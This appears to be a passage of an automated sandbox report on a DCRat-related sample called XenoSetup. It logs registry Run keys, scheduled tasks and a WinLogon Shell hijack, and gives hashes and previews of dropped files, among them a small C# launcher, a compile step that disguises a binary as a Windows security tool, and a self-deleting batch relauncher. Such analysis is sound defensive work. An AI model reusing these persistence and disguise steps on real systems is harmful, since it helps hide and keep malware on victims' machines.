                                                                07:33:04API Interceptor1x Sleep call for process: NZdXlPbVdUubKXQ.exe modified
                                                                13:32:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XenoSetup(1) C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                13:32:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XenoSetup(1) C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                13:32:51Task SchedulerRun new task: NZdXlPbVdUubKXQ path: "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
                                                                13:32:51Task SchedulerRun new task: NZdXlPbVdUubKXQN path: "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
                                                                13:32:54Task SchedulerRun new task: DriverbrokerCrtDhcp path: "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                                                                13:32:54Task SchedulerRun new task: DriverbrokerCrtDhcpD path: "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                                                                13:32:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
                                                                13:33:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                                                                13:33:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
                                                                13:33:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                                                                13:33:30AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQ "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
                                                                13:33:38AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcp "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                                                                13:33:54AutostartRun: WinLogon Shell "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
                                                                13:34:02AutostartRun: WinLogon Shell "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                                                                No context
                                                                No context
                                                                No context
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\Desktop\ARRIhAyp.logDCobxod.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  SearchIndexer.exeGet hashmaliciousDCRat, Neshta, PureLog Stealer, zgRATBrowse
                                                                    85D5ktqjpd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      3XtEci4Mmo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        aW6kSsgdvv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            kJrNOFEGbQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              lEwK4xROgV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                zZ1Y43bxxV.exeGet hashmaliciousDCRatBrowse
                                                                                  VqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):1168
                                                                                    Entropy (8bit):4.448520842480604
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4608
                                                                                    Entropy (8bit):3.914766306138698
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6nYmdtFxZ8RxeOAkFJOcV4MKe28dPXfPvqBH3uulB+hnqXSfbNtm:qyxvxVx9vPPvkpTkZzNt
                                                                                    MD5:5FC7366144CDE7BD293819461793C12A
                                                                                    SHA1:F9E3F99B00E53AE0157984E4E14B8EA8F28C6E8D
                                                                                    SHA-256:28841168D8723AC5DBC2E7776213522EB973767D89C76EC79E0464973091D412
                                                                                    SHA-512:EEE7881A7A6BF41B8BCC90D60F86BE91A5BC8CB81CD3D49F43BF3E8FE2CF04C4BCC3FF552A2146F0A380525882DB16C1FD451B0B3C936E4501A6A837D88254C6
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.............................'... ...@....@.. ....................................@.................................T'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..,.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1915
                                                                                    Entropy (8bit):5.363869398054153
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4vb
                                                                                    MD5:B3D8CC65029ED629D3371F6862D653E0
                                                                                    SHA1:9D3D093780ABCE0D0DC0CDCE5EBE8E77BCEDC621
                                                                                    SHA-256:83F3CDA23DB0E9B53FDDA654446707DDE6F92D4566938AE499471C701F88C245
                                                                                    SHA-512:3ED07C087E69A317D904D2E73E024B561AF2B92F273B30CB9B748D3B4D20B502CC32322EDA60F46A4AAE5A030FBBE3C39F73A06BC5415DC26BFCF59273CFC7BF
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):1281
                                                                                    Entropy (8bit):5.370111951859942
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                    Process:C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):654
                                                                                    Entropy (8bit):5.380476433908377
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                    Malicious:true
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1510207563435464
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                    Malicious:false
                                                                                    Preview:@...e................................................@..........
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                    Category:dropped
                                                                                    Size (bytes):391
                                                                                    Entropy (8bit):5.033908413401092
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLmniFkD:JNVQIbSfhV7TiFkMSfhCiFkD
                                                                                    MD5:2294737FFFA3D4E71D0151DD90936344
                                                                                    SHA1:2DE2772F3E51BFE351FA74D1877FB191E3BDFD22
                                                                                    SHA-256:7A016BE12F374313C894FC7BE98D7324FCE940EF6C24BFF20ACF848D4E6E4AE7
                                                                                    SHA-512:496867F376C4A5553E853EAF5AD633F55E27CCDE6C918061EBAAA723390B165E2A34B22AC3A9B97FCAAAC129AF80C7976A2092AE6F7836265C5ABE96969F1A6A
                                                                                    Malicious:false
                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"); } catch { } }).Start();. }.}.
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):253
                                                                                    Entropy (8bit):5.063275417743161
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723feK39n:Hu7L//TRq79cQnaZ9
                                                                                    MD5:B9C5E161831E4F18077070E3E89366BC
                                                                                    SHA1:AF9CEF0D0894B1FE0500ACDDDDB7D3CE2DD9D2BA
                                                                                    SHA-256:E83C312D9972C23CFB50A2589718B044EB636C0AA9C7E665BB91AD33ED232611
                                                                                    SHA-512:C30B7CF32037AE2C33D0B203EE5DB51A3E8FDA79B14D0A44E35654F4B8BCC2D640A133D2302B40FDEAB749470C35BC9DF74DFF2FF48829ACD1238347502FDC6F
                                                                                    Malicious:false
                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.0.cs"
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (326), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):747
                                                                                    Entropy (8bit):5.252702941311131
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Z2MI/u7L//TRq79cQnaZ4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:0MI/un/Vq79tnaZ4Kax5DqBVKVrdFAMb
                                                                                    MD5:A38E2849DFE59304715A43957F39013A
                                                                                    SHA1:F891507C439CEC2EAA091EE2C4BC194AB8E2B910
                                                                                    SHA-256:88C7AE2978DD08966EC0DB6004119C6078C20DD21BE170067CADF6D9042647AB
                                                                                    SHA-512:5396EE2D672067DB574B4D8A7FA3745A6EA570EEBBA2373FEC4274C023AB814FF1EADE460961615FB26F09659214F93783BDC3CA62C4718072231CEED4FC46B5
                                                                                    Malicious:false
                                                                                    Preview:.C:\portBrokerDll> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):171
                                                                                    Entropy (8bit):5.087622954075878
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mmXBFAXhJ3hjX3qwsLAdASBktKcKZG1N+E2J5xAIgg:hCRLuVFOOr+DEmRwZNXskbKOZG1N7237
                                                                                    MD5:BA9AD761A27922A1A3AEF3D52A8221C4
                                                                                    SHA1:4B7D4F70B4CA3C70F561764365B97551DBFE9846
                                                                                    SHA-256:0FA90728A791515C5BAF8C94627884D31EA0B57233507EDA3EE1E32842D35572
                                                                                    SHA-512:60C4ECF4C29F780F3CE4BBD8F567BDAA81DCB03961BBE939ABE95938611CAB6285173746E9DD4FE5E68B1B01193990A9DA7248DECA545C90E9747F7B9EE47456
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8dcADkVv20.bat"
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):1192
                                                                                    Entropy (8bit):4.4621588860521735
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:uhxLMuZhNQQplkcv+YplkcIPNnqNdt4+lEbNFjMyi07:COulNLn+YLoqTSfbNtme
                                                                                    MD5:DC289C30C143FD2F8E608119AE4846A0
                                                                                    SHA1:2F0D6888B80D26D9FF52B5DECDD63963255E5113
                                                                                    SHA-256:37AAC241C050FB90090B36441AE1F198D11A0DA4EE5F30E3332673F3C6ECF40A
                                                                                    SHA-512:68BFFD2B69EE9D5857FC9D5B2A71561A985738B5FE0768FC7DD23A753C976529158042F2A239FFE74ED99B5BD4B469FD2220A990D20A742935F5560A55F2D6FD
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................\...<...............0...........\.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...D.....I.n.t.e.r.n.a.l.N.a.m.e...X.e.n.o.S.e.t.u.p.(.1.)...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...L.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...X.e.n.o.S.e.t.u.p.(.1.)...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.403856189774724
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:kG+mn:1+m
                                                                                    MD5:6C39D401B2D661AE03C5583576BA65BD
                                                                                    SHA1:FCDA5B21914C1E7E48A9DAA6C8CBC9C35EEA5ED2
                                                                                    SHA-256:2BB5BCB9F9402AFAACBF4F072A4DA2B4FAD01BE4D8C5CABDDF32CEB24B0C956B
                                                                                    SHA-512:9B80AD9A1E3DFB0B5179B000EFF397525C832295DB1A3AD991C69B93BD6FB214E9A9986B24285741AD1BFEB0B070348A37088A3E374C232ACA301C382F1D9ECF
                                                                                    Malicious:false
                                                                                    Preview:p5Tpm1Jkma7822PRQ0gNSelVo
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Mon Jan 13 14:18:02 2025, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1924
                                                                                    Entropy (8bit):4.603219596415286
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HRtm9BLz07/gaHBqwKNN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:xILz0zlhBKNilmuulB+hnqXSfbNtmhn
                                                                                    MD5:C38DBC53B61402C0A5E73635EDDEFC3F
                                                                                    SHA1:AA8BE4A664174C3563FC3A9C09A1ABFD194E78F9
                                                                                    SHA-256:9A9264B4ED2C7B51B9BFD9DEB1D47A9C200E23A90E5A46EEE870F31E950EDD59
                                                                                    SHA-512:C6C3E197EF973CBA5E10E1A928879B867A7B3B9C0656E3690C2ADD1A75B317E0E82AA6D7B23B030C1197F441525FE13B063224260456D1E94FA50FD74E2B4680
                                                                                    Malicious:false
                                                                                    Preview:L.... .g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RES4177.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\portBrokerDll.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d8, 10 symbols, created Mon Jan 13 14:18:03 2025, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1936
                                                                                    Entropy (8bit):4.5801901370802165
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:H869QaUSFCaHQwKNNclOxLMuZhNQQplkcv+YplkcIPNnqpdt4+lEbNFjMyi0+uC:jLBfKNqlOOulNLn+YLoqXSfbNtmhZ
                                                                                    MD5:1CB4758501806A14191C1265109B126C
                                                                                    SHA1:09EFBE7125F754CD15E2EDCAC99B799061585314
                                                                                    SHA-256:00D8A9178EB5659F479DED9B7D8691D6B57554A2DABD94158288B188BFDE1F53
                                                                                    SHA-512:129EE5451B0407A3B78D9351C6F0BD78EB8799DD92F9595FBCFC4BBB0570E01E22BBEED62F13216DBAB3F330A7018EEAB5E35C9875C6D623462BEEE56616AA57
                                                                                    Malicious:false
                                                                                    Preview:L.... .g.............debug$S........H...................@..B.rsrc$01................t...........@..@.rsrc$02........P...................@..@........N....c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP..................(.0.C./.`...HF...........7.......C:\Users\user\AppData\Local\Temp\RES436B.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\portBrokerDll.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................\...............................................\.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...D.....I.n.t.e.r.n.a.l.N.a.m.e...X.e.n.o.
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Mon Jan 13 14:18:04 2025, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1948
                                                                                    Entropy (8bit):4.551540606792553
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HpjG9EnOOGszaHyWwKNN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:VES1KNKluOulajfqXSfbNtmhY2Z
                                                                                    MD5:F38F38DE6FA1CC365360CB54BB15A0BC
                                                                                    SHA1:755B23CBE32338F10B88EAA7EE7BCC8A4AE28676
                                                                                    SHA-256:9590322D1996F96FFD23971655562C50807BDD81C8B3174747A1ECD7D91C06E3
                                                                                    SHA-512:CED516B1AB6CF0ED291B0475896E108A63373F5FDEA01ADABCAFF7BF4C970B34761600517D16793BAB601E7EDE2EEC22EA614B4A91D5FCE6D8CC6839A7B023DE
                                                                                    Malicious:false
                                                                                    Preview:L.... .g.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........;....c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP...................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RES458E.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\portBrokerDll.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.
                                                                                    Process:C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3722240
                                                                                    Entropy (8bit):0.38798312363186405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:rjK4UGDHXrQ8hy7qgpHulWD9ZvZ5Pf3Ca10xuZ04ntfOUhBu7R:rjK4TDUqgpqWDLZ5H+xuZ04nhA
                                                                                    MD5:056586E6A4D9B97C77FD606B2A63F604
                                                                                    SHA1:B13E10949DF28F3944C68B950617A641EA20491B
                                                                                    SHA-256:4D3B4EF0EC929EBD649637F55AABD856954E3D6424AC337A17EE4BB65EC2E8F3
                                                                                    SHA-512:DA2C4066A7975EDE5C1645D6CD82F0499B452A021D18AA86AD64130EFC9F1DA2270BE30A7AF89B4CCE97B0EB13C27F55F37C70DB5F2F6AA4A2B5A54DCAE72CC0
                                                                                    Malicious:true
